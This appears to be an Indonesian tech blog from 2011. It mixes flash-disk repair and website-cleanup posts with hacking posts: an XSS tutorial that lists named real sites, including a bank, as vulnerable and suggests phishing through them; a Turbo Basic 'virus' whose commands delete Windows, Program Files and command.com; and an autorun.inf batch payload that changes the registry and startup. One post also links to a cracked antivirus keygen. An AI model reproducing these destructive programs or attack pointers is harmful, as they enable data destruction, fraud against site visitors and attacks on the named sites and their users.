Ads 468x60px

Saturday, August 20, 2011

cara mudah belajar hack dengan XSS

Mungkin cara hack web dengan memanfaatkan XSS sudah banyak dibicarakan tetapi masih banyak para web master yang meremehkan hal ini karena dianggap XSS tidak membahayakan..!!! Untuk dapat melakukan aktifitas hacking seperti ini tidak perlu mempunyai keahlian atau keterampilan khusus tetapi hanya mengerti dasar dari HTML saja sudah cukup..!!! Tetapi apa itu XSS..??? XSS adalah Salah satu jenis serangan web yang dilakukan dengan memanfaatkan kelemahan pada suatu aplikasi web sehingga memungkinkan `bad guys` untuk menginjeksikan suatu tag HTML ataupun Client Side Script pada aplikasi web tersebut dikarenakan adanya variabel yang tidak disanitasi dengan baik. XSS sendiri merupakan singkatan dari Cross Site Scripting. Lalu bagaimana cara mengetahui bahwa suatu situs memiliki kelemahan pada XSS..???

Untuk mengetahui apakah suatu web mempunyai kelemahan pada XSS sangatlah mudah..!!! Pada suatu web biasanya terdapat fasilitas untuk search. Nah biasanya kita mengetikan keyword biasa saja contoh “hack” tanpa tanda kutip maka akan muncul kata-kata berikut “No Result For Hack” atau kata-kata lain..!!! Lho jadi apa bedanya..???
Hmm… Mungkin dengan contoh atau langsung mencobanya menjadi lebih mudah..!!! Ok saya coba dengan sebuah situs berikut http://www.21cineplex.com/

Langkah Pertama yaitu perhatikan menu search pada situs tersebut. Lalu ketikan dengan keyword “hack” tanpa tanda kutip. lalu tekan enter.!!! Maka tampilan akan seperti ini..!!!
Maka akan muncul keterangan bahwa kata hack tidak ditemukan..!!!
Sekarang coba Kamu ketikan keyword seperti ini
hack

Copy dan pastekan kode tersebut pada menu search lalu enter..!! Hmm… kata hack tadi jadi lebih besar dan berkedip bukan..!!!

Karena Script HTML yang tadi kita tulis dapat berjalan maka hal ini lah yang disebut dengan XSS..!!! Lalu apa hanya kode HTML saja yang dapat di jalankan..??? Hm… Mungkin itu tergantung dari web itu sendiri seberapa besar kelemahannya..!!! Oh ya.. Kembali pada pekerjaan kita tadi, Jadi pada situs tersebut kita dapat sesuka hati untuk merubah tampilan dari situs tersebut atau mungkin untuk pencurian password admin.. WOW..!!!! Coba kamu lihat hasilnya saat ini melalui link berikut www.21cineplex.com

Berikut sedikit situs-situs yang memiliki kelemahan pada XSS :
www.Indonetwork.co.id
www.slankchord.com
www.kerjakarir.info
www.download-provider.com/en
www.jurnalnet.com
www.banknisp.com
www.chordfrenzy.com
www.teknikbisnis.com

Dan Masih banyak lagi situs-situs yang memiliki XSS. Bahkan sampai saat ini masih banyak situs – situs bank indonesia yang juga mempunyai kelemahan yang sama. Coba anda bayangkan dengan XSS kita dapat merubah sedimikan rupa sehingga situs hasil desain kita menjadi mirip dengan situs aslinya..!!! Sebarkan link hasil perbuatan kita maka bukan hal yang tidak mungkin ada orang yang tertipu sehingga memasukan data rahasianya kepada kita..!!! Dan saya harap ini menjadi sebuah pelajaran yang sangat berharga untuk anda khususnya bagi para webmaster dan untuk para pelaku bisnis online untuk berhati-hati..!!!
http://feedproxy.google.com/789
Reade more >>

Thursday, August 18, 2011

cara memperbaiki flash disk yang minta di format

Dalam beberapa kasus kerusakan pada flashdisk, ada 2 jenis kasus kerusakan yang terjadi pada flashdisk, yang pertama flashdisk tersebut memang sudah rusak di karenakan komponen nya memang sudah ada yang terganggu, tetapi ada juga kasus kerusakan pada flashdisk yang kerusakan tersebut terletak pada software nya.

Nah, untuk kasus yang kedua yaitu kerusakan flashdisk yang terletak pada kerusakan software nya ini merupakan kasus yang biasanya terjadi pada kebanyakan flashdisk, dan biasanya flashdisk tersebut langsung di buang oleh si pemilik nya.

Sebenarnya ada beberapa cara untuk membetulkan flashdisk yang rusak yang di sebabkan oleh kerusakan yang terletak pada software flashdisk tersebut. berikut ini adalah cara-cara nya :

1. download software Hp drive boot utility melalui link ini
DOWNLOAD HP DRIVE KEY BOOT UTILITY
2. instal software yang telah di download.

3. pasang flashdisk anda ke komputer

4. jalankan aplikasi yang sudah di instal tadi

5. Pilih tipe format disk yang mau di gunakan (FAT, FAT32 atau NTFS)

6. Pilih Quick Format

7. Pilih Create New or Replace Existing Configuration

Dalam beberapa kasus memang ada yang berhasil ada juga yang tidak, itu tergantung dari letak kerusakan, jika memang terletak pada software flashdisk tersebut maka flashdisk pun dapat di gunakan kembali.

Tetapi bila letak kerusakan pada komponen nya, maka kerusakan tersebut tidak dapat dibetulkan dengan cara ini.
Reade more >>

Flashdisk Tidak Terbaca di Komputer | USB Best Storage

– Pernahkah anda mengalami kerusakan USB Flashdisk ? Seperti flashdisk terdeteksi namun ketika di klik drive flashdisk tersebut muncul tulisan Insert Disk (Please Insert a Disk Into Drive x :) seperti gambar berikut.

usb flasdisk tidak terbaca

Kejadian ini menimpa saya ketika beberapa waktu yang lalu dan sedikit pusing untuk memperbaikinya. Masalahnya adalah flashdisk tersebut tidak bermasalah dengan device/driver dan timbul drive flashdisk tersebut di My Computer. Namun ketika di klik akan timbul pesan Please Insert a Disk seperti gambar di atas.

Dengan bermodalkan searching di google maka di dapatkan beberapa alternatif yaitu :

1. Memformat hardisk -> Klik Kanan Drive Flashdisk dan Format atau bisa juga lewat Command Prompt dengan perintah : format [driveflasdisk]:

Cara ini tidak berhasil karena drive Flashdisk tidak terdeteksi.
2. Partisi ulang drive Flashdisk -> klik kanan drive flashdisk, klik manage.

Kemudian klik kanan removable drive partition flashdisk tersebut dan klik Change Drive Letter and Paths.

Cara ini juga tidak berhasil

Pernah juga coba dengan software tool usb untuk HP (nama toolnya lupa) namun tak jua membuahkan hasil dan pesan error juga tetap muncul di flashdisk.

Akhirnya dapat juga software untuk memperbaiki flashdisk rusak tersebut, nama softwarenya Super Stick Recovery ToolsV1.0.2.19.

usb flasdisk rusak

Cara kerjanya juga cukup mudah

1. download softwarenya
2. Colokkan flashdisk
3. Jalankan software maka akan lansung mendeteksi device driver usb flashdisk
4. Selanjutnya klik Update.
5. Tunggu proses penggantian drivernya selesai dan flashdisk bisa digunakan kembali.

Notes : Tool ini pernah saya coba untuk 2 jenis flashdisk yaitu Kingston dan USB best Storage. Untuk jenis yang lain belum dicoba. Tool ini juga sepertinya tidak mampu untuk memperbaiki flashdisk yang mati total.

download softwarenya pada link dibawah ini
http://www.mediafire.com/?5zz0zmz4yyw#2

dan bila software diatas tidak berhasil, coba download software lain pada link ini

Reade more >>

Tuesday, August 16, 2011

cara menghapus autorun.inf virus dari drive menggunakan notepad

Hapus autorun.inf virus dari drive menggunakan notepad

Sebagian besar orang memiliki masalah autorun dengan flash/hard drive mereka, itu karena modifikasi dari file autorun.inf. Anda hanya perlu membuat file bat dengan sintaks berikut seperti yang disebutkan di bawah ini.
Salin dan sisipkan ini ke Notepad dan menyimpannya sebagai antivirus.bat atau whatever.bat (apapun namanya)

tskill ctfmon

attrib -s -h -r c:\autorun.inf
attrib -s -h -r D:\autorun.inf
attrib -s -h -r E:\autorun.inf
attrib -s -h -r F:\autorun.inf
attrib -s -h -r G:\autorun.inf
attrib -s -h -r H:\autorun.inf
attrib -s -h -r I:\autorun.inf
attrib -s -h -r J:\autorun.inf

del c:\autorun.inf
del d:\autorun.inf
del e:\autorun.inf
del f:\autorun.inf
del g:\autorun.inf
del h:\autorun.inf
del I:\autorun.inf
del J:\autorun.inf

attrib -s -h -r c:\Recycled\ctfmon.exe
attrib -s -h -r D:\Recycled\ctfmon.exe
attrib -s -h -r E:\Recycled\ctfmon.exe
attrib -s -h -r F:\Recycled\ctfmon.exe
attrib -s -h -r G:\Recycled\ctfmon.exe
attrib -s -h -r H:\Recycled\ctfmon.exe
attrib -s -h -r I:\Recycled\ctfmon.exe
attrib -s -h -r J:\Recycled\ctfmon.exe

del c:\Recycled\ctfmon.exe
del D:\Recycled\ctfmon.exe
del E:\Recycled\ctfmon.exe
del F:\Recycled\ctfmon.exe
del G:\Recycled\ctfmon.exe
del H:\Recycled\ctfmon.exe
del I:\Recycled\ctfmon.exe
del J:\Recycled\ctfmon.exe

attrib -s -h -r "C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\ctfmon.exe"
del "C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\ctfmon.exe"

tskill explorer
explorer
pause

Selamat Mencoba & Semoga Bermanfaat…
Reade more >>

menghilangkan virus shortcut mso.sys dengan notepad.............

Virus mso.sys merupakan virus yang cukup menjengkelkan bagi saya, bagaimana tidak setiap kali di hapus muncul kembali, di kill dari task manager maka akan muncul lagi . Dalam task manager virus ini menuju ke rundll32.exe dalam direktori windows .
Setiap kali virus ini berjalan maka akan membuat sebuah shorcut yang menuju ke mso.sys, setiap kali flashdisk di tancapkan maka virus ini akan menginfeksi flashdisk tersebut dengan shorcut beberapa macam nama, serta mso.sys sebagai masternya. Jika komputer kita melakukan autorun pasti akan terinfeksi virus ini. virus ini dapat menyebar melalu lan, folder sharing dll. maka cukup sulit jika menghilangkan virus ini dalam sebuah workgroup yang cukup besar namun jangan kuwatir saya akan menjelaskan dengan cara mudah dan simple pakai anti virus atau tidak bisa saja.


Cara penghapusan virus shortcut, mso.sys ( cara velshadow team ) :

Matikan Lan, jika ada yang di sharing "JANGAN" di sharing dulu. mengantisipasi agar tidak terinfeksi lagi.
Matikan Autorun http://blog.velshadow.com/2011/01/cara-mematikan-autorun-windows.html agar saat kita membuka flashdisk / hardisk lain tidak otomatis terbaca.
Unhide file file "agar virus yang ter hidden dapat terlihat" bisa pakai fitur smadav
Download smadav pro http://blog.velshadow.com/2010/10/key-crack-keygen-smadav-pro-83.html
masuk ke menu smadav > Tools > System editor > Centang semua > "Restart explorer"
Master virus ini bernama "mso.sys" dalam Hardisk C:/, D:/ dll maka hapus file tersebut jika tidak bisa kill dulu melalui task manager bernama "rundll32.exe" pada username nama komputer, jika tidak ingin menghapusnya maka bisa menggunakan fasilitas "notepad" buka file "mso.sys" pada hardisk C:/,D:/, dst dan pada flasdisk dengan notepad hilangkan tulisan di dalamnya maka akan menjadi "kosong".
hapus sisa - sisa shortcut dalam hardisk. dan folder "Recycle" yang berisi virus shorcut di dalamnya.
hapus startup yang menuju "Recycle.ink" ini menuju ke "mso.sys" atau master virus tadi . dengan cara RUN ketik "msconfig" > startup > uncheck "Recycle"
coba lakukan restart ada shortcut lagi dalam hardisk atau tida, jika tidak ada maka virus tsb sudah hilang dari komputer anda .

Jika task manager ter disable kunjungi link di bawah ini
http://blog.velshadow.com/2009/05/taskmanager-disable-administrator.html

Jika ada pertanyaan silahkan berkomentar ,

Reade more >>

cara membuat virus berbahaya..........

pertama kita harus download Turbo Basic v1.0

Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer, tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali, anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara membuat program perusak (virus) yang sangat sederhana sekali tapi sangat mematikan bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.

Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda dapat mendownloadnya di Google.

Diatas adalah tampilan Turbo Basic, jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code program perusak.

shell "Perintah DOS"

dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda membuat :

shell "c:"
shell "cd\"
shell "del command.com"

Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna komputer tidak dapat booting, kita contohkan yang lain.

shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"

Diatas adalah contoh menghapus Directory My Document, WIndows dan Program FIles, sangat fatal bukan ?

Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi, caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile lalu anda enter, maka source code tersebut akan menjadi file EXE.

Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa TIDAK ADA SATU ANTIVIRUS DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe

Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai jenis Antivirus.
lebih dari setahun yang lalu · Laporkan
Reade more >>

cara membuat virus dengan notepad

ni virus efeknya g t’lalu bahaya….efek dari virus ini cuman mengganti tampilan dari
windows…..tapi cukup bikin kaget juga!!! tapi yg penting gak ke-detect ama anti virus(setahu saya….. )

ni ane dapet dari hasil baca-baca “HELP”-nya windows Xp…trus ane modif sendiri…

note: “HANYA BEKERJA PADA WINDOWS XP”

caranya:
- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… ) script di bawah ini:

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:

[autorun]
open=nama_file.bat

- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya

note:
- jangan disalahgunakan
- maaf kalau pernah diposting
- maaf lagi kalau salah tempat untuk posting,….maklum member baru and masih amatir ….
- lagi-lagi maaf kalau ada yang salah, and mohon dikoreksi ….
- kalau mau buat anti virusnya tinggal di modifikasi nilainya
Reade more >>

Sunday, August 14, 2011

Tanda- tanda Website Yang Terkena Hack dan Badware

tanda tanda yang dapat ditemukan saat website terkena hack atau badware adalah sebagai berikut
1. Penyusupan yang Dilakukan oleh Hacker Indonesia (Hacker Lokal)

Mungkin sekitar setengah tahunan yang lalu sebelum saya menuliskan artikel ini, 2 blog WordPress (.ORG) saya yang berada pada satu server hosting disusupi oleh hacker. Tandanya kedua blog saya tersebut dihacking adalah adanya penggantian naskah pada salah satu artikel/postingan di kedua blog tersebut dengan naskah yang menuliskan pernyataan serta identitas kehackerannya, beserta penulisan link URL yang mengarah ke website komunitas hackernya pula (mungkin hanya sekedar untuk memperkenalkan eksistensinya di dunia online). Untungnya sang hacker hanyalah sekedar iseng, karena ia tidak sampai melakukan ganguan yang lebih parah lagi.

2. HTML Script Injection, PHP Script Injection dan Java Script Injection

Kasus kedua berupa “infeksi script HTML, infeksi script PHP, dan infeksi script Java” yang terjadi beberapa minggu ke belakang sebelum saya menuliskan artikel ini pada salah satu blog adsense (blog WordPress.Org) berbahasa Inggris yang saya miliki. Tetapi bukan hanya pada satu blog yang saya miliki.. infeksi terjadi pula pada 1 blog adsense berbahasa Inggris (blog WordPress.Org), 1 blog berbahasa Indonesia (blog WordPress.Org), dan beberapa situs HTML (web statis) yang kesemuanya dimiliki oleh isteri saya, ditambah lagi infeksi script pada 1 website profil perusahaan yang saya buatkan untuk salah satu sahabat saya (blog WordPress.Org), dimana semuanya berada pada 3 server hosting yang berbeda. waah.. parah juga ya?? :D

Tandanya sebuah website atau blog terkena infeksi script adalah bila pada saat website atau blog tersebut akan dikunjungi (baik dari mesin pencari maupun mengetikkan langsung alamat situsnya di browser), maka pengunjung tidak akan bisa atau khawatir untuk meneruskan membuka website atau blog tersebut karena:

a. Diblok oleh anti virus di komputer

Dengan alasan keamanan maka antivirus yang kita instal di komputer kita akan memblok browsernya terlebih dahulu sebelum halaman website atau blognya terbuka. Kalau yang dipasang di komputer kita adalah Avast anti virus, maka biasanya akan muncul peringatan seperti ini:

MALWARE BLOCKED
Avast! Webshield has blocked a threat.
No further action is required.
Object: http://namasitusyangterinfeksi.com/
Infection: HTML: Script-inf atau PHP: Kroxxu-A [Trj] atau JS:ScriptIP-inf[Trj]
Action: Connection aborted
Process: C:/Program Files/NamaBrowser/NamaBrowser.exe
The threat was detected and blocked while downloading an item rom the web

b. Diblok oleh beberapa browser

Beberapa browser seperti Mozilla Firefox atau Google Chrome akan memblok pengunjung dengan cara memberikan peringatan agar tidak membuka halaman website yang dicuriga akan membahayakan bagi komputer. Seperti pada Google Chrome:

Peringatan: Mengunjungi situs ini dapat membahayakan komputer!
Situs web di namasitusyangterkenainfeksi.com tampaknya menginangi program jahat, yakni perangkat lunak yang dapat membahayakan komputer atau beroperasi tanpa izin Anda. Mengunjungi situs yang berisi program jahat dapat menginfeksi komputer Anda.

dan seterusnya…

Atau pada Mozilla Firefox:

Reported Attack Page!

This web page at namasitusyangterkenainfeksi.com has been reported as an attack page and has been blocked based on your security preferences.

dan seterusnya…

c. Peringatan dari mesin pencari Google

Jika kita akan mengunjungi website atau blog dari mesin pencari seperti Google.com atau Google.co.id, maka di halaman hasil pencarian di bagian bawah nama situs yang terinfeksi badware akan terdapat tulisan peringatan:

This site may harm your computer (Google.com)

atau

Situs ini mungkin berbahaya bagi komputer Anda. (google.co.id)

Dan, peringatan adanya malware (badware) ini bukan hanya dari halaman pencarian, tetapi peringatan ini terdapat pula di Google Webmaster Tools apabila website/blog kita telah terdaftar di sana.

3. Pengalihan Pengunjung (Redirecting) dari mesin pencari ke sebuah Situs tertentu

Nah.. kejadian ini saya alami beberapa hari ke belakang dari saat saya menuliskan artikel ini, dan kejadian tersebut menimpa blog RumahCahaya.com ini. Saya mengetahui ada redirecting tersebut pada saat saya mencoba mengunjungi blog ini melalui mesin pencari, baik itu Google maupun Yahoo, bahkan mungkin juga dari situs mesin pencari lainnya. Pada saat saya akan mengunjungi blog ini melalui mesin pencari tadi, maka saya tidak dibawa ke blog ini, tetapi malah dialihkan ke situs tertentu, yaitu situs yang beralamatkan http://p3p0.com

Dan tentu saja hal tersebut membuat pengunjung lain yang akan masuk ke blog ini melalui mesin pencari akan dialihkan juga ke situs tersebut, sehingga blog saya ini hampir tidak ada pengunjungnya saat itu, terkecuali jika pengunjung langsung menuliskan alamat URL blog ini pada browser (tidak datang melalui mesin pencari), maka meraka tidak akan dialihkan

Nah.. sahabat-sahabat, sampai di sini dulu pembahasan mengenai beberapa tanda sebuah website atau blog terkena badware. Dan di artikel Cara Mengatasi Website Yang Terkena Hack dan Badware nanti, insya Allah akan saya tuliskan mengenai bagaimana “rupanya” badware tersebut, serta bagaimana cara-cara untuk menanggulanginya sehingga situs yang kita miliki atau kelola dapat terbebas dari gangguannya.
Reade more >>

cara mengatasi website yang terkena hack dan badware

hal yang dapat kita lakukan pada website yang terkena hack dan badware adalah sebagai berikut:

1. Pada saat disusupi oleh hacker

Karena pengalaman saya pada saat itu hackernya hanya mengubah salah satu artikel di blog (WordPress.org) tanpa menyerang database serta menghapus file-file di server hosting, maka kita cukup:

* Mengubah password akun (account) untuk masuk ke cPanel hosting.
* Mengubah password akun (account) untuk masuk ke dashboard WordPress.
* Mengembalikan artikel yang telah diubah oleh hacker tersebut kepada keadaan semula.
* Menginstal beberapa plugin “pengaman” wordpress.

2. Pada saat terinfeksi HTML Script Injection, PHP Script Injection dan Java Script Injection

HTML Script Injection, sesuai dengan namanya maka tentu saja menyerang pada file-file hosting yang berekstensi .html. Kode script yang telah diinjeksikan ke banyak file .html adalah seperti ini:

src=http://jeremyjacksonevents.com/celebs/rumble66.php>

PHP Script Injection, sesuai dengan namanya maka tentu saja menyerang pada file-file hosting yang berekstensi PHP. Kode script yang telah diinjeksikan ke beberapa file .php adalah menggunakan kode Eval seperti berikut:

eval(base64_decode(‘aWYoxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
PuAnJangBangedddddddddKodenyaaaaaaaaaaaaaaaaaaaaaaaA
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxJ10pKTs=’)); ?>
Java Script Injection, sesuai dengan namanya juga, maka tentu saja menyerang file hosting yang berekstensi JS. Kode script yang telah menginfeksi file .js menggunakan kode Eval yang sama/mirip seperti yang menyerang pada file-file berektensi PHP.

*Catatan: x = sengaja kode-kode tersebut saya ganti dengan huruf “x” ini, karena kalau tidak, maka halaman blog saya ini akan dicuriga sebagai halaman blog atau website yang mengandung perangkat lunak yang membahayakan bagi pengguna internet (dicurigai mengandung malicious scripts/malware atau secara umum disebut dengan istilah badware)

Injeksi sript tersebut bertujuan untuk menanamkan backlink kepada halaman situs jeremyjacksonevents.com/celebs/rumble66.php secara ilegal. Dan setiap kali kita membuka halaman website/blog kita, maka link ke halaman situs tersebut ikut terbaca pada saat loading.

Cara mengatasinya kasus nomor 2 ini adalah dengan memeriksa satu persatu file-file hosting berektensi .HTML, .PHP, dan .JS di server hosting, lalu kita hapus script beserta kode-kode aneh yang dideteksi sebagai badware pada file-file tersebut. Misalnya kalau pada kasus yang saya alami badware tersebut menginfeksi file-file seperti index.html, readme.html, googlegooglef130xxxx29ffa9ed.html (kode verifikasi Google), serta file-file berektensi .html dan .htm lainnya, index.php, wp-setting.php, wp-config, sampel.php, wpconfig.php, postinfo.html, functions.php, page-index.php, script.js, dan penambahan file berekstensi .php di folder images yaitu bernama gifimg.php yang bisa langsung dihapus.

Tetapi karena file-file tersebut tentu saja akan banyak jumlahnya, dan kita pun akan kerepotan untuk memeriksa satu persatu, maka cara yang bisa dilakukan adalah dengan:

* Untuk keamanan, gantilah terlebih dahulu password akun cPanel hostingnya.
* Untuk blog di WordPress.org, ganti pula password untuk masuk ke dashboarnya.
* Pastikan di komputer terpasang antivirus yang updated, dan pastikan komputer telah terbebas dari virus.
* Download semua folder dan file dari server hosting ke komputer (bisa menggunakan FileZilla)
* Untuk mengetahui file apa saja yang terinfeksi, maka scan semua folder dan file yang telah didowload, dan jangan sampai file-file yang terdeteksi mengandung badware tersebut langsung dihapus/didelete oleh antivirus, tetapi biarkan masuk ke chest/quarantine, supaya nanti kita bisa melihat file-file manakah yang terinfeksi dan harus kita perbaiki.
* Setelah scanning selesai, maka periksa chest/quarantine. Lihat file-file apa saja yang terinfeksi dan harus diperbaiki atau dihilangkan badwarenya tersebut.
* Untuk menghilangkan badware di file-file tadi, kita bisa merestore satu persatu file dari chest/quarantine ke folder asalnya untuk kemudian dihilangkan kode-kode badwarenya lalu diupload pada folder yang sama di server. Tetapi kalau takut akan resiko komputer terinfeksi atau antivirus selalu mengembalikannya ke chest/quarantie, maka kita bisa langsung menghapus kode-kode badware di file-file yang sama di server hosting.
* Jika menemukan file-file asing yang sebelumnya tidak ada di server seperti gifimg.php atau yang lain, maka Anda hapus saja file tadi.
* Setelah semuanya selesai, maka silahkan akses kembali halaman blog atau website yang kita miliki. Jika antivirus sudah tidak membloknya, maka website kita telah terbebas dari badware. Bila masih membloknya atau masih ada peringatan darinya, berarti masih ada file yang belum bersih dari kode-kode badware.

Bila antivirus sudah tidak membloknya, tetapi beberapa browser atau search engine mungkin masih tetap memblok atau memberikan peringatan kepada pengunjung untuk tidak membuka website kita, maka untuk mengatasinya kita harus meminta review ke Google Webmaster Tools dan StopBadware.org. Setelah mereka mereviewnya serta memastikan website/blog kita telah terbebas dari badware, maka biasanya hanya dalam beberapa jam saja website/blog kita sudah terbebas dari pemblokan serta tidak dianggap membahayakan lagi oleh browser dan search engine.

3. Pada saat pengunjung blog dialihkan (redirecting) dari mesin pencari ke sebuah situs tertentu.

Cara mengatasi redirecting seperti ini sangat mudah, yaitu:

* Cek kode-kode pada file HTACCES dan wp-config.php di server hosting menggunakan Filezilla versi terbaru. Dan tidak perlu memeriksanya di melalui cPanel, karena biasanya kode-kode badwarenya disembunyikan (hidden).
* Bila pada file tersebut terdapat kode-kode badware seperti kode Eval tersebut di atas, maka hapuslah kode tersebut.
* Kunjungi blog kita melalui search engine. Bila kita benar-benar telah berhasil menghapus kode badwarenya, maka blog kita pun telah terbebas dari redirecting.

Sahabat-sahabat, cukup ini saja dulu pengalaman yang bisa saya bagikan mengenai cara mengatasi hack dan badware. Di artikel-artikel RumahCahaya yang akan datang, insya Allah saya pun akan memberikan langkah-langkah apa saja sih.. yang harus kita lakukan guna mencegah atau setidaknya meminimalisir website atau blog kita dari upaya-upaya hacking, script injection, iframe injection, dan sebagainya.

Semoga bermanfaat..!!!
Reade more >>

cara hacker membobol website



Cara dan tekhnik bagaimana seorang hacker menembus ataupun menyusup dan juga merusak suatu website adalah sebagai berikut.Teknik teknik itu antara lain:

1. IP Spoofing
2. FTP Attack
3. Unix Finger Exploits
4. Flooding & Broadcasting
5. Fragmented Packet Attacks
6. E-mail Exploits
7. DNS and BIND Vulnerabilities
8. Password Attacks
9.Proxy Server Attacks
10. Remote Command Processing Attacks
11. Remote File System Attack
12. Selective Program Insertions
13. Port Scanning
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
15. HTTPD Attacks

1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.

IP Spoofing terjadi ketika seorang attacker ?mengakali? packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker

2. FTP Attack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang

3. Unix Finger Exploits
Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.

Utility ini juga Menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha kracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ?memberitahu? password dan kode akses terhadap system.

4. Flooding & Broadcasting
Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang Menyediakan informasi menjadi lemah dan akhirnya menyerah.

